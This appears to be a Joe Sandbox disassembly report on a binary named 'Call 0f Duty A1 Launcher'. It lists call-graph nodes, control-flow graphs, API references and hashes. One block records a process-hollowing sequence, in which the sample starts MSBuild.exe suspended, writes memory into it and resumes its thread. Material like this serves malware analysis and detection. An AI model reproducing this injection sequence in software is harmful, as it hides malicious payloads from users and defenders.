9915->9913 9921 37da19 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9916->9921 9918 3785ed 9917->9918 9919 378769 9917->9919 9918->9922 9924 378687 9918->9924 9928 378631 9918->9928 9919->9922 9923 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 9919->9923 9920->9897 9921->9922 9922->9914 9923->9922 9925 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 9924->9925 9927 37869a 9925->9927 9926 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 9926->9922 9927->9922 9929 3786b3 GetLastError 9927->9929 9928->9926 9929->9922 9930 3786c2 9929->9930 9930->9922 9931 37d131 ___scrt_uninitialize_crt WideCharToMultiByte 9930->9931 9931->9930 9936 36bf29 9932->9936 9933 36c021 GetFileSize 9933->9936 9934 36c083 ReadFile 9934->9936 9935 36c12c CloseHandle 9935->9936 9936->9933 9936->9934 9936->9935 9937 36c059 CloseHandle 9936->9937 9938 36c14b 9936->9938 9940 36c10d CloseHandle 9936->9940 9937->9936 9939 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9938->9939 9941 36c160 9939->9941 9940->9936 9941->9906 9948 368783 std::_Throw_Cpp_error 9942->9948 9943 368dd8 9944 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9943->9944 9946 368de8 9944->9946 9945 36ea10 51 API calls std::_Throw_Cpp_error 9945->9948 9946->9906 9947 36e9b0 5 API calls std::_Throw_Cpp_error 9947->9948 9948->9943 9948->9945 9948->9947 9950 361041 9949->9950 9951 367eb0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9950->9951 9952 361451 9951->9952 9953 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9952->9953 9954 367e16 9953->9954 9954->9906 9956 36d560 std::_Throw_Cpp_error 48 API calls 9955->9956 9957 368eb6 9956->9957 9957->9906 9964 3751de EnterCriticalSection 9958->9964 9960 374c90 9960->9885 9965 3751ec LeaveCriticalSection 9961->9965 9963 373d9e 9963->9865 9964->9960 9965->9963 9967 37a15b __dosmaperr 14 API calls 9966->9967 9969 376e89 9967->9969 9968 376ecb ExitThread 9969->9968 9970 376ea2 9969->9970 9975 379d25 9969->9975 9972 376eb5 9970->9972 9973 376eae CloseHandle 9970->9973 9972->9968 9974 376ec1 FreeLibraryAndExitThread 9972->9974 9973->9972 9974->9968 9976 379e9e _unexpected 5 API calls 9975->9976 9977 379d3e 9976->9977 9977->9970 9979 374689 __EH_prolog3_GS 9978->9979 9980 3686c0 std::_Throw_Cpp_error 51 API calls 9979->9980 9981 37469d 9980->9981 9988 3745a6 9981->9988 10006 3742e6 9988->10006 9990 3745d7 10010 374533 9990->10010 9993 36d560 std::_Throw_Cpp_error 48 API calls 9994 3745f9 9993->9994 9995 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9994->9995 9996 374618 9995->9996 9997 36d560 9996->9997 9998 36d584 std::_Throw_Cpp_error 9997->9998 9999 36d6bf std::_Throw_Cpp_error 9998->9999 10079 36d780 9998->10079 10000 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9999->10000 10001 36d6f5 10000->10001 10003 374bd9 10001->10003 10004 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10003->10004 10005 374be3 10004->10005 10005->10005 10007 3742fe 10006->10007 10009 374305 CatchIt 10007->10009 10022 36f980 10007->10022 10009->9990 10011 37453f __EH_prolog3_GS 10010->10011 10013 37455e std::_Throw_Cpp_error 10011->10013 10049 37434e 10011->10049 10014 37434e std::_Throw_Cpp_error 51 API calls 10013->10014 10015 374583 10014->10015 10016 36d560 std::_Throw_Cpp_error 48 API calls 10015->10016 10017 37458b std::_Throw_Cpp_error 10016->10017 10018 36d560 std::_Throw_Cpp_error 48 API calls 10017->10018 10019 37459e 10018->10019 10020 374bd9 std::_Throw_Cpp_error 5 API calls 10019->10020 10021 3745a5 std::domain_error::domain_error 10020->10021 10021->9993 10024 36f9a4 10022->10024 10025 36feac 10024->10025 10029 36ff00 10024->10029 10037 370ff0 10024->10037 10026 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10025->10026 10027 36febc 10026->10027 10027->10009 10030 36ffa3 10029->10030 10031 370ff0 21 API calls std::_Throw_Cpp_error 10030->10031 10032 370642 10030->10032 10040 371010 10030->10040 10044 377d79 10030->10044 10031->10030 10033 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10032->10033 10034 370fc0 10033->10034 10034->10024 10038 3741c6 std::_Throw_Cpp_error 21 API calls 10037->10038 10039 371007 10038->10039 10039->10024 10041 37101e std::_Throw_Cpp_error 10040->10041 10042 3759fc std::_Throw_Cpp_error RaiseException 10041->10042 10043 371036 10042->10043 10045 37809f __strnicoll 48 API calls 10044->10045 10046 377d88 10045->10046 10047 377d96 __strnicoll 11 API calls 10046->10047 10048 377d95 10047->10048 10050 37438f 10049->10050 10052 374365 CatchIt 10049->10052 10053 37476d 10050->10053 10052->10013 10054 374792 10053->10054 10055 374828 10053->10055 10064 36f4d0 10054->10064 10076 36f170 10055->10076 10060 36f980 std::_Throw_Cpp_error 51 API calls 10061 3747ae CatchIt 10060->10061 10062 3747fa CatchIt 10061->10062 10070 36d7f0 10061->10070 10062->10052 10066 36f718 10064->10066 10065 36f2e0 std::_Throw_Cpp_error 5 API calls 10065->10066 10066->10065 10067 36f94d 10066->10067 10068 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10067->10068 10069 36f960 10068->10069 10069->10060 10074 36d8d2 10070->10074 10071 36e5ad std::_Throw_Cpp_error 10072 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10071->10072 10073 36e5d5 10072->10073 10073->10062 10074->10071 10075 36e600 std::_Throw_Cpp_error 48 API calls 10074->10075 10075->10074 10077 374846 std::_Xinvalid_argument 50 API calls 10076->10077 10078 36f182 10077->10078 10080 36d7f0 std::_Throw_Cpp_error 48 API calls 10079->10080 10081 36d7ab 10080->10081 10081->9998 10083 374114 10082->10083 10084 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10083->10084 10085 374196 10084->10085 10085->9779 10087 37499a 10086->10087 10088 374968 GetExitCodeThread 10086->10088 10087->9722 10088->10087 10089 374979 CloseHandle 10088->10089 10089->9722 10092 378477 ___scrt_is_nonwritable_in_current_image 10091->10092 10093 37a00a _unexpected 48 API calls 10092->10093 10096 37847c 10093->10096 10094 37835d CallUnexpected 48 API calls 10095 3784a6 10094->10095 10096->10094 10098 37705f 10097->10098 10099 37704d 10097->10099 10115 3771ba 10098->10115 10100 3753ec CallUnexpected GetModuleHandleW 10099->10100 10102 377052 10100->10102 10102->10098 10109 376f54 GetModuleHandleExW 10102->10109 10104 376f0c 10104->8638 10110 376fb4 10109->10110 10111 376f93 GetProcAddress 10109->10111 10113 376fc3 10110->10113 10114 376fba FreeLibrary 10110->10114 10111->10110 10112 376fa7 10111->10112 10112->10110 10113->10098 10114->10113 10116 3771c6 ___scrt_is_nonwritable_in_current_image 10115->10116 10130 378161 EnterCriticalSection 10116->10130 10118 3771d0 10131 3770b7 10118->10131 10120 3771dd 10135 3771fb 10120->10135 10123 376fef 10160 376fd6 10123->10160 10125 376ff9 10126 37700d 10125->10126 10127 376ffd GetCurrentProcess TerminateProcess 10125->10127 10128 376f54 CallUnexpected 3 API calls 10126->10128 10127->10126 10129 377015 ExitProcess 10128->10129 10130->10118 10132 3770c3 ___scrt_is_nonwritable_in_current_image CallUnexpected 10131->10132 10133 377127 CallUnexpected 10132->10133 10138 37776b 10132->10138 10133->10120 10159 378178 LeaveCriticalSection 10135->10159 10137 377096 10137->10104 10137->10123 10139 377777 __EH_prolog3 10138->10139 10142 3779f6 10139->10142 10141 37779e CallUnexpected 10141->10133 10143 377a02 ___scrt_is_nonwritable_in_current_image 10142->10143 10150 378161 EnterCriticalSection 10143->10150 10145 377a10 10151 3778c1 10145->10151 10150->10145 10152 3778e0 10151->10152 10153 3778d8 10151->10153 10152->10153 10154 37b0cb __freea 14 API calls 10152->10154 10155 377a45 10153->10155 10154->10153 10158 378178 LeaveCriticalSection 10155->10158 10157 377a2e 10157->10141 10158->10157 10159->10137 10163 37b94f 10160->10163 10162 376fdb CallUnexpected 10162->10125 10164 37b95e CallUnexpected 10163->10164 10165 37b96b 10164->10165 10167 379d53 10164->10167 10165->10162 10168 379e9e _unexpected 5 API calls 10167->10168 10169 379d6f 10168->10169 10169->10165 10171 376a8f ___scrt_uninitialize_crt 10170->10171 10172 376a7d 10170->10172 10171->8681 10173 376a8b 10172->10173 10175 37b4a7 10172->10175 10173->8681 10178 37b5d2 10175->10178 10181 37b6ab 10178->10181 10182 37b6b7 ___scrt_is_nonwritable_in_current_image 10181->10182 10189 378161 EnterCriticalSection 10182->10189 10184 37b6c1 ___scrt_uninitialize_crt 10185 37b72d 10184->10185 10190 37b61f 10184->10190 10198 37b74b 10185->10198 10189->10184 10191 37b62b ___scrt_is_nonwritable_in_current_image 10190->10191 10201 376aef EnterCriticalSection 10191->10201 10193 37b635 ___scrt_uninitialize_crt 10197 37b66e 10193->10197 10202 37b4b0 10193->10202 10215 37b69f 10197->10215 10314 378178 LeaveCriticalSection 10198->10314 10200 37b4ae 10200->10173 10201->10193 10203 37b4c5 __strnicoll 10202->10203 10204 37b4d7 10203->10204 10205 37b4cc 10203->10205 10218 37b515 10204->10218 10206 37b5d2 ___scrt_uninitialize_crt 77 API calls 10205->10206 10208 37b4d2 10206->10208 10210 377fd7 __strnicoll 48 API calls 10208->10210 10212 37b50f 10210->10212 10212->10197 10213 37b4f8 10231 37e11f 10213->10231 10313 376b03 LeaveCriticalSection 10215->10313 10217 37b68d 10217->10184 10219 37b52e 10218->10219 10223 37b4e1 10218->10223 10220 37d936 ___scrt_uninitialize_crt 48 API calls 10219->10220 10219->10223 10221 37b54a 10220->10221 10242 37e45a 10221->10242 10223->10208 10224 37d936 10223->10224 10225 37d957 10224->10225 10226 37d942 10224->10226 10225->10213 10227 37b757 __strnicoll 14 API calls 10226->10227 10228 37d947 10227->10228 10229 377d69 __strnicoll 48 API calls 10228->10229 10230 37d952 10229->10230 10230->10213 10232 37e130 10231->10232 10233 37e13d 10231->10233 10234 37b757 __strnicoll 14 API calls 10232->10234 10235 37e186 10233->10235 10237 37e164 10233->10237 10239 37e135 10234->10239 10236 37b757 __strnicoll 14 API calls 10235->10236 10238 37e18b 10236->10238 10283 37e19c 10237->10283 10241 377d69 __strnicoll 48 API calls 10238->10241 10239->10208 10241->10239 10244 37e466 ___scrt_is_nonwritable_in_current_image 10242->10244 10243 37e4a7 10245 377f12 __strnicoll 29 API calls 10243->10245 10244->10243 10246 37e4ed 10244->10246 10252 37e46e 10244->10252 10245->10252 10253 37d8d7 EnterCriticalSection 10246->10253 10248 37e4f3 10249 37e511 10248->10249 10254 37e23e 10248->10254 10280 37e563 10249->10280 10252->10223 10253->10248 10255 37e266 10254->10255 10275 37e289 ___scrt_uninitialize_crt 10254->10275 10256 37e26a 10255->10256 10258 37e2c5 10255->10258 10257 377f12 __strnicoll 29 API calls 10256->10257 10257->10275 10259 37e2e3 10258->10259 10260 37fa51 ___scrt_uninitialize_crt 50 API calls 10258->10260 10261 37e56b ___scrt_uninitialize_crt 49 API calls 10259->10261 10260->10259 10262 37e2f5 10261->10262 10263 37e342 10262->10263 10264 37e2fb 10262->10264 10265 37e356 10263->10265 10266 37e3ab WriteFile 10263->10266 10267 37e303 10264->10267 10268 37e32a 10264->10268 10269 37e397 10265->10269 10270 37e35e 10265->10270 10271 37e3cd GetLastError 10266->10271 10266->10275 10267->10275 10276 37e9af ___scrt_uninitialize_crt 6 API calls 10267->10276 10272 37e5e8 ___scrt_uninitialize_crt 54 API calls 10268->10272 10277 37ea17 ___scrt_uninitialize_crt 7 API calls 10269->10277 10273 37e383 10270->10273 10274 37e363 10270->10274 10271->10275 10272->10275 10278 37ebdb ___scrt_uninitialize_crt 8 API calls 10273->10278 10274->10275 10279 37eaf2 ___scrt_uninitialize_crt 7 API calls 10274->10279 10275->10249 10276->10275 10277->10275 10278->10275 10279->10275 10281 37d8fa ___scrt_uninitialize_crt LeaveCriticalSection 10280->10281 10282 37e569 10281->10282 10282->10252 10284 37e1a8 ___scrt_is_nonwritable_in_current_image 10283->10284 10296 37d8d7 EnterCriticalSection 10284->10296 10286 37e1b7 10287 37e1fc 10286->10287 10297 37d68e 10286->10297 10289 37b757 __strnicoll 14 API calls 10287->10289 10291 37e203 10289->10291 10290 37e1e3 FlushFileBuffers 10290->10291 10292 37e1ef GetLastError 10290->10292 10310 37e232 10291->10310 10293 37b76a __dosmaperr 14 API calls 10292->10293 10293->10287 10296->10286 10298 37d69b 10297->10298 10302 37d6b0 10297->10302 10299 37b76a __dosmaperr 14 API calls 10298->10299 10301 37d6a0 10299->10301 10300 37b76a __dosmaperr 14 API calls 10304 37d6e0 10300->10304 10305 37b757 __strnicoll 14 API calls 10301->10305 10302->10300 10303 37d6d5 10302->10303 10303->10290 10306 37b757 __strnicoll 14 API calls 10304->10306 10307 37d6a8 10305->10307 10308 37d6e8 10306->10308 10307->10290 10309 377d69 __strnicoll 48 API calls 10308->10309 10309->10307 10311 37d8fa ___scrt_uninitialize_crt LeaveCriticalSection 10310->10311 10312 37e21b 10311->10312 10312->10239 10313->10217 10314->10200

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0038B0FF,0038B0EF), ref: 0038B323
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0038B336
                                                                                      • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 0038B354
                                                                                      • ReadProcessMemory.KERNELBASE(00000098,?,0038B143,00000004,00000000), ref: 0038B378
                                                                                      • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 0038B3A3
                                                                                      • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 0038B3FB
                                                                                      • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 0038B446
                                                                                      • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 0038B484
                                                                                      • Wow64SetThreadContext.KERNEL32(0000009C,02990000), ref: 0038B4C0
                                                                                      • ResumeThread.KERNELBASE(0000009C), ref: 0038B4CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                      • API String ID: 2687962208-3857624555
                                                                                      • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                      • Instruction ID: 3f7302a6db97f977c42c08b60dc2638a3eb4a6fa02b299f4fbabf00194ad776b
                                                                                      • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                      • Instruction Fuzzy Hash: 6CB1187660064AAFDB60CF68CC80BDAB3A5FF88714F158564EA0CAB741D770FA51CB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f03d9f7140aa78611ec6fd5cb1f2760888b604a2f80e54d9ed3148156205755b
                                                                                      • Instruction ID: 8c5f7825dad01164a521537236f6c5ca842b98ac2662ab80249f4ae12c4f61e4
                                                                                      • Opcode Fuzzy Hash: f03d9f7140aa78611ec6fd5cb1f2760888b604a2f80e54d9ed3148156205755b
                                                                                      • Instruction Fuzzy Hash: F3011974A043088FC725DF69D885AD9F7F0EB18710F0084A9A8889B351EB78AA84CF85

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 26 379dd3-379ddf 27 379e71-379e74 26->27 28 379de4-379df5 27->28 29 379e7a 27->29 30 379df7-379dfa 28->30 31 379e02-379e1b LoadLibraryExW 28->31 32 379e7c-379e80 29->32 33 379e00 30->33 34 379e9a-379e9c 30->34 35 379e81-379e91 31->35 36 379e1d-379e26 GetLastError 31->36 38 379e6e 33->38 34->32 35->34 37 379e93-379e94 FreeLibrary 35->37 39 379e5f-379e6c 36->39 40 379e28-379e3a call 37bc93 36->40 37->34 38->27 39->38 40->39 43 379e3c-379e4e call 37bc93 40->43 43->39 46 379e50-379e5d LoadLibraryExW 43->46 46->35 46->39
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,7967C5A5,?,00379EE2,?,?,00000000), ref: 00379E94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3664257935-537541572
                                                                                      • Opcode ID: 89fa7a08949cf370b472c53ee8abe8fe371215264d99a64b1777206d997f42b2
                                                                                      • Instruction ID: 2971664b12e8ddde77a8014996c3f52b758420eb80afa6f39e5032cc834184e9
                                                                                      • Opcode Fuzzy Hash: 89fa7a08949cf370b472c53ee8abe8fe371215264d99a64b1777206d997f42b2
                                                                                      • Instruction Fuzzy Hash: F421D831A00311ABC733D765DC41B5A776CAF81770F264252ED4AA7695D774ED01C7E0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 47 36beb0-36bf22 CreateFileA 48 36bf29-36bf37 47->48 49 36bff2-36c00c 48->49 50 36bf3d-36bf4a 48->50 51 36c16a 49->51 53 36bf50-36bf5d 50->53 54 36c021-36c054 GetFileSize 50->54 51->48 56 36bf63-36bf70 53->56 57 36c078-36c0ce call 374233 ReadFile 53->57 54->51 60 36bf76-36bf83 56->60 61 36c011-36c01c 56->61 57->51 64 36c12c-36c146 CloseHandle 60->64 65 36bf89-36bf96 60->65 61->51 64->51 67 36c0f6-36c108 call 37423c 65->67 68 36bf9c-36bfa9 65->68 67->51 71 36c0d3-36c0f1 68->71 72 36bfaf-36bfbc 68->72 71->51 75 36bfc2-36bfcf 72->75 76 36c059-36c073 CloseHandle 72->76 78 36bfd5-36bfe2 75->78 79 36c14b-36c169 call 374241 75->79 76->51 82 36c10d-36c127 CloseHandle 78->82 83 36bfe8-36bfed 78->83 82->51 83->51
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: a2b306682796c2665fb781565bc886cbba24fd58f5741f7d1157bcc2dcef4678
                                                                                      • Instruction ID: 7596550411ba2058545d57b845bca0663217ef85665c74d099f8faa57d8af546
                                                                                      • Opcode Fuzzy Hash: a2b306682796c2665fb781565bc886cbba24fd58f5741f7d1157bcc2dcef4678
                                                                                      • Instruction Fuzzy Hash: CE7168B4A04209DFCB05DFACD5586AEFBF4EB48700F10855EE886EB358DB3899448F52

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(?,?,Function_00016E00,00000000,?,?), ref: 00376D2F
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,00373BEA), ref: 00376D3B
                                                                                      • __dosmaperr.LIBCMT ref: 00376D42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 2744730728-0
                                                                                      • Opcode ID: f7a40d8c5ad0388f9061a5b133b27c1fcf7874ff6b21923990c90b54d68731b5
                                                                                      • Instruction ID: ec851357202986cd8f9e4028203e69e8c7131efafd61353c81aef6dc97d89e9a
                                                                                      • Opcode Fuzzy Hash: f7a40d8c5ad0388f9061a5b133b27c1fcf7874ff6b21923990c90b54d68731b5
                                                                                      • Instruction Fuzzy Hash: 74019272610649AFCF36AFA0DC26AEE7BA9EF40354F108058F8099A150DB78DE10DB90

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000002,?,003770B1,003783A0,003783A0,?,00000002,7967C5A5,003783A0,00000002), ref: 00377000
                                                                                      • TerminateProcess.KERNEL32(00000000,?,003770B1,003783A0,003783A0,?,00000002,7967C5A5,003783A0,00000002), ref: 00377007
                                                                                      • ExitProcess.KERNEL32 ref: 00377019
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 7d23816474fe7b2589f57bc8697bca7f64386ad3af7256f22efb11a18aeebf71
                                                                                      • Instruction ID: 12d5624d06a988f1c23b04b9ef5ce002f9019f77b42ba09657e8fbfbe3f80011
                                                                                      • Opcode Fuzzy Hash: 7d23816474fe7b2589f57bc8697bca7f64386ad3af7256f22efb11a18aeebf71
                                                                                      • Instruction Fuzzy Hash: 53D06731004608AFCF236F61EC1A99D3F2AAB44351F188051F90D5A162CB79D956DB90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 113 3741c6-3741c9 114 3741d8-3741db call 3783c7 113->114 116 3741e0-3741e3 114->116 117 3741e5-3741e6 116->117 118 3741cb-3741d6 call 377207 116->118 118->114 121 3741e7-3741eb 118->121 122 3749c2-3749f2 call 371040 call 3759fc IsProcessorFeaturePresent 121->122 123 3741f1-3749c1 call 37482e call 3759fc 121->123 134 3749f4-3749f7 122->134 135 3749f9-374ad8 call 374ad9 122->135 123->122 134->135
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003749EA
                                                                                      • ___raise_securityfailure.LIBCMT ref: 00374AD2
                                                                                        • Part of subcall function 003759FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,003749DE,7967C5A5,?,?,?,003749DE,?,00389B2C), ref: 00375A5C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                                      • String ID:
                                                                                      • API String ID: 3749517692-0
                                                                                      • Opcode ID: cdbebeb10211ecbc7d02cfe28ba2140266656e83d461b5a9cc3a097151bb2329
                                                                                      • Instruction ID: 589fcd4420d919d157e284f97087a588937cc52f0ff24d9a6c22eeda3bf7df74
